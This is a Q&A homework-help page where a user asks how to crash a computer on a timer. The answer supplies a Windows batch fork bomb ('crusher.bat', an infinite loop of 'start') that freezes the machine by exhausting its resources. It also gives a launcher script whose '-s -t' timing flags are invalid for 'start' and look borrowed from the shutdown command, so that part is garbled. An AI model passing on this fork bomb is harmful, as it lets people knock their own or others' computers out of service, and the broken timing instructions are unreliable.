Computer Science, asked by anjalijoshi6482, 1 year ago

How to set up time to crash down a computer system?

Answers

Answered by M3CH4
0
write it on notepad
@echo off
start crusher.bat -s -t (whatever time you want)

Save in time.bat


write another programme on notepad
@echo off
:a
start
goto a


save in crusher.bat
and open the first programme

here is your answer mark it as brainliest
Similar questions